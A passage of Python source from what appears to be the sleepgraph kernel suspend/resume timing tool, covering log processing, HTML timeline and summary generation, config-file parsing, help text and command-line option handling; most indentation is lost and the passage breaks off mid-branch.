def processData(live=False, quiet=False):
if not quiet:
pprint('PROCESSING: %s' % sysvals.htmlfile)
sysvals.vprint('usetraceevents=%s, usetracemarkers=%s, usekprobes=%s' % \
(sysvals.usetraceevents, sysvals.usetracemarkers, sysvals.usekprobes))
error = ''
if(sysvals.usetraceevents):
testruns, error = parseTraceLog(live)
if sysvals.dmesgfile:
for data in testruns:
data.extractErrorInfo()
else:
testruns = loadKernelLog()
for data in testruns:
parseKernelLog(data)
if(sysvals.ftracefile and (sysvals.usecallgraph or sysvals.usetraceevents)):
appendIncompleteTraceLog(testruns)
if not sysvals.stamp:
pprint('ERROR: data does not include the expected stamp')
return (testruns, {'error': 'timeline generation failed'})
shown = ['bios', 'biosdate', 'cpu', 'host', 'kernel', 'man', 'memfr',
'memsz', 'mode', 'numcpu', 'plat', 'time', 'wifi']
sysvals.vprint('System Info:')
for key in sorted(sysvals.stamp):
if key in shown:
sysvals.vprint(' %-8s : %s' % (key.upper(), sysvals.stamp[key]))
sysvals.vprint('Command:\n %s' % sysvals.cmdline)
for data in testruns:
if data.turbostat:
idx, s = 0, 'Turbostat:\n '
for val in data.turbostat.split('|'):
idx += len(val) + 1
if idx >= 80:
idx = 0
s += '\n '
s += val + ' '
sysvals.vprint(s)
data.printDetails()
if len(sysvals.platinfo) > 0:
sysvals.vprint('\nPlatform Info:')
for info in sysvals.platinfo:
sysvals.vprint('[%s - %s]' % (info[0], info[1]))
sysvals.vprint(info[2])
sysvals.vprint('')
if sysvals.cgdump:
for data in testruns:
data.debugPrint()
sys.exit(0)
if len(testruns) < 1:
pprint('ERROR: Not enough test data to build a timeline')
return (testruns, {'error': 'timeline generation failed'})
sysvals.vprint('Creating the html timeline (%s)...' % sysvals.htmlfile)
createHTML(testruns, error)
if not quiet:
pprint('DONE: %s' % sysvals.htmlfile)
data = testruns[0]
stamp = data.stamp
stamp['suspend'], stamp['resume'] = data.getTimeValues()
if data.fwValid:
stamp['fwsuspend'], stamp['fwresume'] = data.fwSuspend, data.fwResume
if error:
stamp['error'] = error
return (testruns, stamp)
# Function: rerunTest
# Description:
# generate an output from an existing set of ftrace/dmesg logs
def rerunTest(htmlfile=''):
if sysvals.ftracefile:
doesTraceLogHaveTraceEvents()
if not sysvals.dmesgfile and not sysvals.usetraceevents:
doError('recreating this html output requires a dmesg file')
if htmlfile:
sysvals.htmlfile = htmlfile
else:
sysvals.setOutputFile()
if os.path.exists(sysvals.htmlfile):
if not os.path.isfile(sysvals.htmlfile):
doError('a directory already exists with this name: %s' % sysvals.htmlfile)
elif not os.access(sysvals.htmlfile, os.W_OK):
doError('missing permission to write to %s' % sysvals.htmlfile)
testruns, stamp = processData()
sysvals.resetlog()
return stamp
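# Because the command-line handling at the bottom of this file only runs
# under __main__, the module can also be imported and driven directly.
# A hypothetical library-style rerun over existing logs (file names are
# examples only):
#
#    import sleepgraph as sg
#    sg.sysvals.dmesgfile = 'host_mem_dmesg.txt'
#    sg.sysvals.ftracefile = 'host_mem_ftrace.txt'
#    stamp = sg.rerunTest('host_mem.html')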
# Function: runTest
# Description:
# execute a suspend/resume, gather the logs, and generate the output
def runTest(n=0, quiet=False):
# prepare for the test
sysvals.initTestOutput('suspend')
op = sysvals.writeDatafileHeader(sysvals.dmesgfile, [])
op.write('# EXECUTION TRACE START\n')
op.close()
if n <= 1:
if sysvals.rs != 0:
sysvals.dlog('%sabling runtime suspend' % ('en' if sysvals.rs > 0 else 'dis'))
sysvals.setRuntimeSuspend(True)
if sysvals.display:
ret = sysvals.displayControl('init')
sysvals.dlog('xset display init, ret = %d' % ret)
sysvals.dlog('initialize ftrace')
sysvals.initFtrace(quiet)
# execute the test
executeSuspend(quiet)
sysvals.cleanupFtrace()
if sysvals.skiphtml:
sysvals.outputResult({}, n)
sysvals.sudoUserchown(sysvals.testdir)
return
testruns, stamp = processData(True, quiet)
for data in testruns:
del data
sysvals.sudoUserchown(sysvals.testdir)
sysvals.outputResult(stamp, n)
if 'error' in stamp:
return 2
return 0
def find_in_html(html, start, end, firstonly=True):
cnt, out, list = len(html), [], []
if firstonly:
m = re.search(start, html)
if m:
list.append(m)
else:
list = re.finditer(start, html)
for match in list:
s = match.end()
e = cnt if (len(out) < 1 or s + 10000 > cnt) else s + 10000
m = re.search(end, html[s:e])
if not m:
break
e = s + m.start()
str = html[s:e]
if end == 'ms':
num = re.search(r'[-+]?\d*\.\d+|\d+', str)
str = num.group() if num else 'NaN'
if firstonly:
return str
out.append(str)
if firstonly:
return ''
return out
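# A hypothetical use of the scraper above on a small html fragment; the
# markers mirror the ones data_from_html() searches for below.
def exampleFindInHtml():
    html = '<div class="stamp">myhost 5.4.0 mem</div> Kernel Suspend: 1250.5 ms'
    stamp = find_in_html(html, '<div class="stamp">', '</div>')
    suspend = find_in_html(html, 'Kernel Suspend', 'ms')
    return (stamp, suspend)    # -> ('myhost 5.4.0 mem', '1250.5')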
def data_from_html(file, outpath, issues, fulldetail=False):
html = open(file, 'r').read()
sysvals.htmlfile = os.path.relpath(file, outpath)
# extract general info
suspend = find_in_html(html, 'Kernel Suspend', 'ms')
resume = find_in_html(html, 'Kernel Resume', 'ms')
sysinfo = find_in_html(html, '<div class="stamp sysinfo">', '</div>')
line = find_in_html(html, '<div class="stamp">', '</div>')
stmp = line.split()
if not suspend or not resume or len(stmp) != 8:
return False
try:
dt = datetime.strptime(' '.join(stmp[3:]), '%B %d %Y, %I:%M:%S %p')
except:
return False
sysvals.hostname = stmp[0]
tstr = dt.strftime('%Y/%m/%d %H:%M:%S')
error = find_in_html(html, '<table class="testfail"><tr><td>', '</td>')
if error:
m = re.match('[a-z0-9]* failed in (?P<p>\S*).*', error)
if m:
result = 'fail in %s' % m.group('p')
else:
result = 'fail'
else:
result = 'pass'
# extract error info
tp, ilist = False, []
extra = dict()
log = find_in_html(html, '<div id="dmesglog" style="display:none;">',
'</div>').strip()
if log:
d = Data(0)
d.end = 999999999
d.dmesgtext = log.split('\n')
tp = d.extractErrorInfo()
for msg in tp.msglist:
sysvals.errorSummary(issues, msg)
if stmp[2] == 'freeze':
extra = d.turbostatInfo()
elist = dict()
for dir in d.errorinfo:
for err in d.errorinfo[dir]:
if err[0] not in elist:
elist[err[0]] = 0
elist[err[0]] += 1
for i in elist:
ilist.append('%sx%d' % (i, elist[i]) if elist[i] > 1 else i)
wifi = find_in_html(html, 'Wifi Resume: ', '</td>')
if wifi:
extra['wifi'] = wifi
low = find_in_html(html, 'freeze time: <b>', ' ms</b>')
for lowstr in ['waking', '+']:
if not low:
break
if lowstr not in low:
continue
if lowstr == '+':
issue = 'S2LOOPx%d' % len(low.split('+'))
else:
m = re.match('.*waking *(?P<n>[0-9]*) *times.*', low)
issue = 'S2WAKEx%s' % m.group('n') if m else 'S2WAKExNaN'
match = [i for i in issues if i['match'] == issue]
if len(match) > 0:
match[0]['count'] += 1
if sysvals.hostname not in match[0]['urls']:
match[0]['urls'][sysvals.hostname] = [sysvals.htmlfile]
elif sysvals.htmlfile not in match[0]['urls'][sysvals.hostname]:
match[0]['urls'][sysvals.hostname].append(sysvals.htmlfile)
else:
issues.append({
'match': issue, 'count': 1, 'line': issue,
'urls': {sysvals.hostname: [sysvals.htmlfile]},
})
ilist.append(issue)
# extract device info
devices = dict()
for line in html.split('\n'):
m = re.match(' *<div id=\"[a,0-9]*\" *title=\"(?P<title>.*)\" class=\"thread.*', line)
if not m or 'thread kth' in line or 'thread sec' in line:
continue
m = re.match('(?P<n>.*) \((?P<t>[0-9,\.]*) ms\) (?P<p>.*)', m.group('title'))
if not m:
continue
name, time, phase = m.group('n'), m.group('t'), m.group('p')
if ' async' in name or ' sync' in name:
name = ' '.join(name.split(' ')[:-1])
if phase.startswith('suspend'):
d = 'suspend'
elif phase.startswith('resume'):
d = 'resume'
else:
continue
if d not in devices:
devices[d] = dict()
if name not in devices[d]:
devices[d][name] = 0.0
devices[d][name] += float(time)
# create worst device info
worst = dict()
for d in ['suspend', 'resume']:
worst[d] = {'name':'', 'time': 0.0}
dev = devices[d] if d in devices else 0
if dev and len(dev.keys()) > 0:
n = sorted(dev, key=lambda k:(dev[k], k), reverse=True)[0]
worst[d]['name'], worst[d]['time'] = n, dev[n]
data = {
'mode': stmp[2],
'host': stmp[0],
'kernel': stmp[1],
'sysinfo': sysinfo,
'time': tstr,
'result': result,
'issues': ' '.join(ilist),
'suspend': suspend,
'resume': resume,
'devlist': devices,
'sus_worst': worst['suspend']['name'],
'sus_worsttime': worst['suspend']['time'],
'res_worst': worst['resume']['name'],
'res_worsttime': worst['resume']['time'],
'url': sysvals.htmlfile,
}
for key in extra:
data[key] = extra[key]
if fulldetail:
data['funclist'] = find_in_html(html, '<div title="', '" class="traceevent"', False)
if tp:
for arg in ['-multi ', '-info ']:
if arg in tp.cmdline:
data['target'] = tp.cmdline[tp.cmdline.find(arg):].split()[1]
break
return data
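# The dict returned above feeds the summary tables built by runSummary; an
# abridged, representative entry (values are illustrative, not from a real
# run):
#
#    {
#        'mode': 'mem', 'host': 'myhost', 'kernel': '5.4.0',
#        'time': '2020/01/01 12:00:00', 'result': 'pass', 'issues': '',
#        'suspend': '1250.5', 'resume': '890.2',
#        'sus_worst': 'i915', 'sus_worsttime': 180.6,
#        'res_worst': 'nvme 0000:3a:00.0', 'res_worsttime': 320.4,
#        'url': 'suspend-200101-120000/myhost_mem.html',
#    }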
def genHtml(subdir, force=False):
for dirname, dirnames, filenames in os.walk(subdir):
sysvals.dmesgfile = sysvals.ftracefile = sysvals.htmlfile = ''
for filename in filenames:
file = os.path.join(dirname, filename)
if sysvals.usable(file):
if(re.match('.*_dmesg.txt', filename)):
sysvals.dmesgfile = file
elif(re.match('.*_ftrace.txt', filename)):
sysvals.ftracefile = file
sysvals.setOutputFile()
if (sysvals.dmesgfile or sysvals.ftracefile) and sysvals.htmlfile and \
(force or not sysvals.usable(sysvals.htmlfile)):
pprint('FTRACE: %s' % sysvals.ftracefile)
if sysvals.dmesgfile:
pprint('DMESG : %s' % sysvals.dmesgfile)
rerunTest()
# Function: runSummary
# Description:
# create a summary of tests in a sub-directory
def runSummary(subdir, local=True, genhtml=False):
inpath = os.path.abspath(subdir)
outpath = os.path.abspath('.') if local else inpath
pprint('Generating a summary of folder:\n %s' % inpath)
if genhtml:
genHtml(subdir)
target, issues, testruns = '', [], []
desc = {'host':[],'mode':[],'kernel':[]}
for dirname, dirnames, filenames in os.walk(subdir):
for filename in filenames:
if(not re.match('.*.html', filename)):
continue
data = data_from_html(os.path.join(dirname, filename), outpath, issues)
if(not data):
continue
if 'target' in data:
target = data['target']
testruns.append(data)
for key in desc:
if data[key] not in desc[key]:
desc[key].append(data[key])
pprint('Summary files:')
if len(desc['host']) == len(desc['mode']) == len(desc['kernel']) == 1:
title = '%s %s %s' % (desc['host'][0], desc['kernel'][0], desc['mode'][0])
if target:
title += ' %s' % target
else:
title = inpath
createHTMLSummarySimple(testruns, os.path.join(outpath, 'summary.html'), title)
pprint(' summary.html - tabular list of test data found')
createHTMLDeviceSummary(testruns, os.path.join(outpath, 'summary-devices.html'), title)
pprint(' summary-devices.html - kernel device list sorted by total execution time')
createHTMLIssuesSummary(testruns, issues, os.path.join(outpath, 'summary-issues.html'), title)
pprint(' summary-issues.html - kernel issues found sorted by frequency')
# Function: checkArgBool
# Description:
# check if a boolean string value is true or false
def checkArgBool(name, value):
if value in switchvalues:
if value in switchoff:
return False
return True
doError('invalid boolean --> (%s: %s), use "true/false" or "1/0"' % (name, value), True)
return False
# Function: configFromFile
# Description:
# Configure the script via the info in a config file
def configFromFile(file):
Config = configparser.ConfigParser()
Config.read(file)
sections = Config.sections()
overridekprobes = False
overridedevkprobes = False
if 'Settings' in sections:
for opt in Config.options('Settings'):
value = Config.get('Settings', opt).lower()
option = opt.lower()
if(option == 'verbose'):
sysvals.verbose = checkArgBool(option, value)
elif(option == 'addlogs'):
sysvals.dmesglog = sysvals.ftracelog = checkArgBool(option, value)
elif(option == 'dev'):
sysvals.usedevsrc = checkArgBool(option, value)
elif(option == 'proc'):
sysvals.useprocmon = checkArgBool(option, value)
elif(option == 'x2'):
if checkArgBool(option, value):
sysvals.execcount = 2
elif(option == 'callgraph'):
sysvals.usecallgraph = checkArgBool(option, value)
elif(option == 'override-timeline-functions'):
overridekprobes = checkArgBool(option, value)
elif(option == 'override-dev-timeline-functions'):
overridedevkprobes = checkArgBool(option, value)
elif(option == 'skiphtml'):
sysvals.skiphtml = checkArgBool(option, value)
elif(option == 'sync'):
sysvals.sync = checkArgBool(option, value)
elif(option == 'rs' or option == 'runtimesuspend'):
if value in switchvalues:
if value in switchoff:
sysvals.rs = -1
else:
sysvals.rs = 1
else:
doError('invalid value --> (%s: %s), use "enable/disable"' % (option, value), True)
elif(option == 'display'):
disopt = ['on', 'off', 'standby', 'suspend']
if value not in disopt:
doError('invalid value --> (%s: %s), use %s' % (option, value, disopt), True)
sysvals.display = value
elif(option == 'gzip'):
sysvals.gzip = checkArgBool(option, value)
elif(option == 'cgfilter'):
sysvals.setCallgraphFilter(value)
elif(option == 'cgskip'):
if value in switchoff:
sysvals.cgskip = ''
else:
sysvals.cgskip = sysvals.configFile(value)
if(not sysvals.cgskip):
doError('%s does not exist' % value)
elif(option == 'cgtest'):
sysvals.cgtest = getArgInt('cgtest', value, 0, 1, False)
elif(option == 'cgphase'):
d = Data(0)
if value not in d.phasedef:
doError('invalid phase --> (%s: %s), valid phases are %s'\
% (option, value, d.phasedef.keys()), True)
sysvals.cgphase = value
elif(option == 'fadd'):
file = sysvals.configFile(value)
if(not file):
doError('%s does not exist' % value)
sysvals.addFtraceFilterFunctions(file)
elif(option == 'result'):
sysvals.result = value
elif(option == 'multi'):
nums = value.split()
if len(nums) != 2:
doError('multi requires 2 integers (exec_count and delay)', True)
sysvals.multiinit(nums[0], nums[1])
elif(option == 'devicefilter'):
sysvals.setDeviceFilter(value)
elif(option == 'expandcg'):
sysvals.cgexp = checkArgBool(option, value)
elif(option == 'srgap'):
if checkArgBool(option, value):
sysvals.srgap = 5
elif(option == 'mode'):
sysvals.suspendmode = value
elif(option == 'command' or option == 'cmd'):
sysvals.testcommand = value
elif(option == 'x2delay'):
sysvals.x2delay = getArgInt('x2delay', value, 0, 60000, False)
elif(option == 'predelay'):
sysvals.predelay = getArgInt('predelay', value, 0, 60000, False)
elif(option == 'postdelay'):
sysvals.postdelay = getArgInt('postdelay', value, 0, 60000, False)
elif(option == 'maxdepth'):
sysvals.max_graph_depth = getArgInt('maxdepth', value, 0, 1000, False)
elif(option == 'rtcwake'):
if value in switchoff:
sysvals.rtcwake = False
else:
sysvals.rtcwake = True
sysvals.rtcwaketime = getArgInt('rtcwake', value, 0, 3600, False)
elif(option == 'timeprec'):
sysvals.setPrecision(getArgInt('timeprec', value, 0, 6, False))
elif(option == 'mindev'):
sysvals.mindevlen = getArgFloat('mindev', value, 0.0, 10000.0, False)
elif(option == 'callloop-maxgap'):
sysvals.callloopmaxgap = getArgFloat('callloop-maxgap', value, 0.0, 1.0, False)
elif(option == 'callloop-maxlen'):
sysvals.callloopmaxlen = getArgFloat('callloop-maxlen', value, 0.0, 1.0, False)
elif(option == 'mincg'):
sysvals.mincglen = getArgFloat('mincg', value, 0.0, 10000.0, False)
elif(option == 'bufsize'):
sysvals.bufsize = getArgInt('bufsize', value, 1, 1024*1024*8, False)
elif(option == 'output-dir'):
sysvals.outdir = sysvals.setOutputFolder(value)
if sysvals.suspendmode == 'command' and not sysvals.testcommand:
doError('No command supplied for mode "command"')
# compatibility errors
if sysvals.usedevsrc and sysvals.usecallgraph:
doError('-dev is not compatible with -f')
if sysvals.usecallgraph and sysvals.useprocmon:
doError('-proc is not compatible with -f')
if overridekprobes:
sysvals.tracefuncs = dict()
if overridedevkprobes:
sysvals.dev_tracefuncs = dict()
kprobes = dict()
kprobesec = 'dev_timeline_functions_'+platform.machine()
if kprobesec in sections:
for name in Config.options(kprobesec):
text = Config.get(kprobesec, name)
kprobes[name] = (text, True)
kprobesec = 'timeline_functions_'+platform.machine()
if kprobesec in sections:
for name in Config.options(kprobesec):
if name in kprobes:
doError('Duplicate timeline function found "%s"' % (name))
text = Config.get(kprobesec, name)
kprobes[name] = (text, False)
for name in kprobes:
function = name
format = name
color = ''
args = dict()
text, dev = kprobes[name]
data = text.split()
i = 0
for val in data:
# bracketed strings are special formatting, read them separately
if val[0] == '[' and val[-1] == ']':
for prop in val[1:-1].split(','):
p = prop.split('=')
if p[0] == 'color':
try:
color = int(p[1], 16)
color = '#'+p[1]
except:
color = p[1]
continue
# first real arg should be the format string
if i == 0:
format = val
# all other args are actual function args
else:
d = val.split('=')
args[d[0]] = d[1]
i += 1
if not function or not format:
doError('Invalid kprobe: %s' % name)
for arg in re.findall('{(?P<n>[a-z,A-Z,0-9]*)}', format):
if arg not in args:
doError('Kprobe "%s" is missing argument "%s"' % (name, arg))
if (dev and name in sysvals.dev_tracefuncs) or (not dev and name in sysvals.tracefuncs):
doError('Duplicate timeline function found "%s"' % (name))
kp = {
'name': name,
'func': function,
'format': format,
sysvals.archargs: args
}
if color:
kp['color'] = color
if dev:
sysvals.dev_tracefuncs[name] = kp
else:
sysvals.tracefuncs[name] = kp
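# A minimal config file accepted by the parser above (values are examples):
#
#    [Settings]
#    verbose: true
#    mode: freeze
#    rtcwake: 15
#    skiphtml: false
#
# Kprobe sections ([timeline_functions_<arch>] and
# [dev_timeline_functions_<arch>]) are optional and use the same
# option: value layout, with the value holding the format string and its
# arguments as described in the loop above.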
# Function: printHelp
# Description:
# print out the help text
def printHelp():
pprint('\n%s v%s\n'\
'Usage: sudo sleepgraph <options> <commands>\n'\
'\n'\
'Description:\n'\
' This tool is designed to assist kernel and OS developers in optimizing\n'\
' their linux stack\'s suspend/resume time. Using a kernel image built\n'\
' with a few extra options enabled, the tool will execute a suspend and\n'\
' capture dmesg and ftrace data until resume is complete. This data is\n'\
' transformed into a device timeline and an optional callgraph to give\n'\
' a detailed view of which devices/subsystems are taking the most\n'\
' time in suspend/resume.\n'\
'\n'\
' If no specific command is given, the default behavior is to initiate\n'\
' a suspend/resume and capture the dmesg/ftrace output as an html timeline.\n'\
'\n'\
' Generates output files in subdirectory: suspend-yymmdd-HHMMSS\n'\
' HTML output: <hostname>_<mode>.html\n'\
' raw dmesg output: <hostname>_<mode>_dmesg.txt\n'\
' raw ftrace output: <hostname>_<mode>_ftrace.txt\n'\
'\n'\
'Options:\n'\
' -h Print this help text\n'\
' -v Print the current tool version\n'\
' -config fn Pull arguments and config options from file fn\n'\
' -verbose Print extra information during execution and analysis\n'\
' -m mode Mode to initiate for suspend (default: %s)\n'\
' -o name Overrides the output subdirectory name when running a new test\n'\
' default: suspend-{date}-{time}\n'\
' -rtcwake t Wakeup t seconds after suspend, set t to "off" to disable (default: 15)\n'\
' -addlogs Add the dmesg and ftrace logs to the html output\n'\
' -noturbostat Dont use turbostat in freeze mode (default: disabled)\n'\
' -srgap Add a visible gap in the timeline between sus/res (default: disabled)\n'\
' -skiphtml Run the test and capture the trace logs, but skip the timeline (default: disabled)\n'\
' -result fn Export a results table to a text file for parsing.\n'\
' -wifi If a wifi connection is available, check that it reconnects after resume.\n'\
' [testprep]\n'\
' -sync Sync the filesystems before starting the test\n'\
' -rs on/off Enable/disable runtime suspend for all devices, restore all after test\n'\
' -display m Change the display mode to m for the test (on/off/standby/suspend)\n'\
' [advanced]\n'\
' -gzip Gzip the trace and dmesg logs to save space\n'\
' -cmd {s} Run the timeline over a custom command, e.g. "sync -d"\n'\
' -proc Add usermode process info into the timeline (default: disabled)\n'\
' -dev Add kernel function calls and threads to the timeline (default: disabled)\n'\
' -x2 Run two suspend/resumes back to back (default: disabled)\n'\
' -x2delay t Include t ms delay between multiple test runs (default: 0 ms)\n'\
' -predelay t Include t ms delay before 1st suspend (default: 0 ms)\n'\
' -postdelay t Include t ms delay after last resume (default: 0 ms)\n'\
' -mindev ms Discard all device blocks shorter than ms milliseconds (e.g. 0.001 for us)\n'\
' -multi n d Execute <n> consecutive tests at <d> seconds intervals. If <n> is followed\n'\
' by a "d", "h", or "m" execute for <n> days, hours, or mins instead.\n'\
' The outputs will be created in a new subdirectory with a summary page.\n'\
' -maxfail n Abort a -multi run after n consecutive fails (default is 0 = never abort)\n'\
' [debug]\n'\
' -f Use ftrace to create device callgraphs (default: disabled)\n'\
' -ftop Use ftrace on the top level call: "%s" (default: disabled)\n'\
' -maxdepth N limit the callgraph data to N call levels (default: 0=all)\n'\
' -expandcg pre-expand the callgraph data in the html output (default: disabled)\n'\
' -fadd file Add functions to be graphed in the timeline from a list in a text file\n'\
' -filter "d1,d2,..." Filter out all but this comma-delimited list of device names\n'\
' -mincg ms Discard all callgraphs shorter than ms milliseconds (e.g. 0.001 for us)\n'\
' -cgphase P Only show callgraph data for phase P (e.g. suspend_late)\n'\
' -cgtest N Only show callgraph data for test N (e.g. 0 or 1 in an x2 run)\n'\
' -timeprec N Number of significant digits in timestamps (0:S, [3:ms], 6:us)\n'\
' -cgfilter S Filter the callgraph output in the timeline\n'\
' -cgskip file Callgraph functions to skip, off to disable (default: cgskip.txt)\n'\
' -bufsize N Set trace buffer size to N kilo-bytes (default: all of free memory)\n'\
' -devdump Print out all the raw device data for each phase\n'\
' -cgdump Print out all the raw callgraph data\n'\
'\n'\
'Other commands:\n'\
' -modes List available suspend modes\n'\
' -status Test to see if the system is enabled to run this tool\n'\
' -fpdt Print out the contents of the ACPI Firmware Performance Data Table\n'\
' -wificheck Print out wifi connection info\n'\
' -x<mode> Test xset by toggling the given mode (on/off/standby/suspend)\n'\
' -sysinfo Print out system info extracted from BIOS\n'\
' -devinfo Print out the pm settings of all devices which support runtime suspend\n'\
' -cmdinfo Print out all the platform info collected before and after suspend/resume\n'\
' -flist Print the list of functions currently being captured in ftrace\n'\
' -flistall Print all functions capable of being captured in ftrace\n'\
' -summary dir Create a summary of tests in this dir [-genhtml builds missing html]\n'\
' [redo]\n'\
' -ftrace ftracefile Create HTML output using ftrace input (used with -dmesg)\n'\
' -dmesg dmesgfile Create HTML output using dmesg (used with -ftrace)\n'\
'' % (sysvals.title, sysvals.version, sysvals.suspendmode, sysvals.ftopfunc))
return True
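# Example invocations derived from the help text above (illustrative only; the
# script name, durations and file names are assumptions):
#   sudo ./sleepgraph.py -m mem -rtcwake 15 -addlogs
#   sudo ./sleepgraph.py -m freeze -multi 10 30 -maxfail 2 -o freeze-tests
#   sudo ./sleepgraph.py -ftrace host_mem_ftrace.txt -dmesg host_mem_dmesg.txt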
# ----------------- MAIN --------------------
# exec start (skipped if script is loaded as library)
if __name__ == '__main__':
genhtml = False
cmd = ''
simplecmds = ['-sysinfo', '-modes', '-fpdt', '-flist', '-flistall',
'-devinfo', '-status', '-xon', '-xoff', '-xstandby', '-xsuspend',
'-xinit', '-xreset', '-xstat', '-wificheck', '-cmdinfo']
if '-f' in sys.argv:
sysvals.cgskip = sysvals.configFile('cgskip.txt')
# loop through the command line arguments
args = iter(sys.argv[1:])
for arg in args:
if(arg == '-m'):
try:
val = next(args)
except:
doError('No mode supplied', True)
if val == 'command' and not sysvals.testcommand:
doError('No command supplied for mode "command"', True)
sysvals.suspendmode = val
elif(arg in simplecmds):
cmd = arg[1:]
elif(arg == '-h'):
printHelp()
sys.exit(0)
elif(arg == '-v'):
pprint("Version %s" % sysvals.version)
sys.exit(0)
elif(arg == '-x2'):
sysvals.execcount = 2
elif(arg == '-x2delay'):
sysvals.x2delay = getArgInt('-x2delay', args, 0, 60000)
elif(arg == '-predelay'):
sysvals.predelay = getArgInt('-predelay', args, 0, 60000)
elif(arg == '-postdelay'):
sysvals.postdelay = getArgInt('-postdelay', args, 0, 60000)
elif(arg == '-f'):
sysvals.usecallgraph = True
elif(arg == '-ftop'):
sysvals.usecallgraph = True
sysvals.ftop = True
sysvals.usekprobes = False
elif(arg == '-skiphtml'):
sysvals.skiphtml = True
elif(arg == '-cgdump'):
sysvals.cgdump = True
elif(arg == '-devdump'):
sysvals.devdump = True
elif(arg == '-genhtml'):
genhtml = True
elif(arg == '-addlogs'):
sysvals.dmesglog = sysvals.ftracelog = True
elif(arg == '-nologs'):
sysvals.dmesglog = sysvals.ftracelog = False
elif(arg == '-addlogdmesg'):
sysvals.dmesglog = True
elif(arg == '-addlogftrace'):
sysvals.ftracelog = True
elif(arg == '-noturbostat'):
sysvals.tstat = False
elif(arg == '-verbose'):
sysvals.verbose = True
elif(arg == '-proc'):
sysvals.useprocmon = True
elif(arg == '-dev'):
sysvals.usedevsrc = True
elif(arg == '-sync'):
sysvals.sync = True
elif(arg == '-wifi'):
sysvals.wifi = True
elif(arg == '-gzip'):
sysvals.gzip = True
elif(arg == '-info'):
try:
val = next(args)
except:
doError('-info requires one string argument', True)
elif(arg == '-desc'):
try:
val = next(args)
except:
doError('-desc requires one string argument', True)
elif(arg == '-rs'):
try:
val = next(args)
except:
doError('-rs requires "enable" or "disable"', True)
if val.lower() in switchvalues:
if val.lower() in switchoff:
sysvals.rs = -1
else:
sysvals.rs = 1
else:
doError('invalid option: %s, use "enable/disable" or "on/off"' % val, True)
elif(arg == '-display'):
try:
val = next(args)
except:
				doError('-display requires a mode value', True)
disopt = ['on', 'off', 'standby', 'suspend']
if val.lower() not in disopt:
doError('valid display mode values are %s' % disopt, True)
sysvals.display = val.lower()
elif(arg == '-maxdepth'):
sysvals.max_graph_depth = getArgInt('-maxdepth', args, 0, 1000)
elif(arg == '-rtcwake'):
try:
val = next(args)
except:
doError('No rtcwake time supplied', True)
if val.lower() in switchoff:
sysvals.rtcwake = False
else:
sysvals.rtcwake = True
sysvals.rtcwaketime = getArgInt('-rtcwake', val, 0, 3600, False)
elif(arg == '-timeprec'):
sysvals.setPrecision(getArgInt('-timeprec', args, 0, 6))
elif(arg == '-mindev'):
sysvals.mindevlen = getArgFloat('-mindev', args, 0.0, 10000.0)
elif(arg == '-mincg'):
sysvals.mincglen = getArgFloat('-mincg', args, 0.0, 10000.0)
elif(arg == '-bufsize'):
sysvals.bufsize = getArgInt('-bufsize', args, 1, 1024*1024*8)
elif(arg == '-cgtest'):
sysvals.cgtest = getArgInt('-cgtest', args, 0, 1)
elif(arg == '-cgphase'):
try:
val = next(args)
except:
doError('No phase name supplied', True)
d = Data(0)
if val not in d.phasedef:
doError('invalid phase --> (%s: %s), valid phases are %s'\
% (arg, val, d.phasedef.keys()), True)
sysvals.cgphase = val
elif(arg == '-cgfilter'):
try:
val = next(args)
except:
doError('No callgraph functions supplied', True)
sysvals.setCallgraphFilter(val)
elif(arg == '-skipkprobe'):
try:
val = next(args)
except:
doError('No kprobe functions supplied', True)
sysvals.skipKprobes(val)
elif(arg == '-cgskip'):
try:
val = next(args)
except:
doError('No file supplied', True)
if val.lower() in switchoff:
sysvals.cgskip = ''
else:
sysvals.cgskip = sysvals.configFile(val)
if(not sysvals.cgskip):
doError('%s does not exist' % sysvals.cgskip)
elif(arg == '-callloop-maxgap'):
sysvals.callloopmaxgap = getArgFloat('-callloop-maxgap', args, 0.0, 1.0)
elif(arg == '-callloop-maxlen'):
sysvals.callloopmaxlen = getArgFloat('-callloop-maxlen', args, 0.0, 1.0)
elif(arg == '-cmd'):
try:
val = next(args)
except:
doError('No command string supplied', True)
sysvals.testcommand = val
sysvals.suspendmode = 'command'
elif(arg == '-expandcg'):
sysvals.cgexp = True
elif(arg == '-srgap'):
sysvals.srgap = 5
elif(arg == '-maxfail'):
sysvals.maxfail = getArgInt('-maxfail', args, 0, 1000000)
elif(arg == '-multi'):
try:
c, d = next(args), next(args)
except:
doError('-multi requires two values', True)
sysvals.multiinit(c, d)
elif(arg == '-o'):
try:
val = next(args)
except:
doError('No subdirectory name supplied', True)
sysvals.outdir = sysvals.setOutputFolder(val)
elif(arg == '-config'):
try:
val = next(args)
except:
doError('No text file supplied', True)
file = sysvals.configFile(val)
if(not file):
doError('%s does not exist' % val)
configFromFile(file)
elif(arg == '-fadd'):
try:
val = next(args)
except:
doError('No text file supplied', True)
file = sysvals.configFile(val)
if(not file):
doError('%s does not exist' % val)
sysvals.addFtraceFilterFunctions(file)
elif(arg == '-dmesg'):
try:
val = next(args)
except:
doError('No dmesg file supplied', True)
sysvals.notestrun = True
sysvals.dmesgfile = val
if(os.path.exists(sysvals.dmesgfile) == False):
doError('%s does not exist' % sysvals.dmesgfile)
elif(arg == '-ftrace'):
try:
val = next(args)
except:
doError('No ftrace file supplied', True)
sysvals.notestrun = True
sysvals.ftracefile = val
if(os.path.exists(sysvals.ftracefile) == False):
doError('%s does not exist' % sysvals.ftracefile)
elif(arg == '-summary'):
try:
val = next(args)
except:
doError('No directory supplied', True)
cmd = 'summary'
sysvals.outdir = val
sysvals.notestrun = True
if(os.path.isdir(val) == False):
				doError('%s is not accessible' % val)
elif(arg == '-filter'):
try:
val = next(args)
except:
doError('No devnames supplied', True)
sysvals.setDeviceFilter(val)
elif(arg == '-result'):
try:
val = next(args)
except:
doError('No result file supplied', True)
sysvals.result = val
sysvals.signalHandlerInit()
else:
doError('Invalid argument: '+arg, True)
# compatibility errors
if(sysvals.usecallgraph and sysvals.usedevsrc):
doError('-dev is not compatible with -f')
if(sysvals.usecallgraph and sysvals.useprocmon):
doError('-proc is not compatible with -f')
if sysvals.usecallgraph and sysvals.cgskip:
sysvals.vprint('Using cgskip file: %s' % sysvals.cgskip)
sysvals.setCallgraphBlacklist(sysvals.cgskip)
# callgraph size cannot exceed device size
if sysvals.mincglen < sysvals.mindevlen:
sysvals.mincglen = sysvals.mindevlen
# remove existing buffers before calculating memory
if(sysvals.usecallgraph or sysvals.usedevsrc):
sysvals.fsetVal('16', 'buffer_size_kb')
sysvals.cpuInfo()
# just run a utility command and exit
if(cmd != ''):
ret = 0
if(cmd == 'status'):
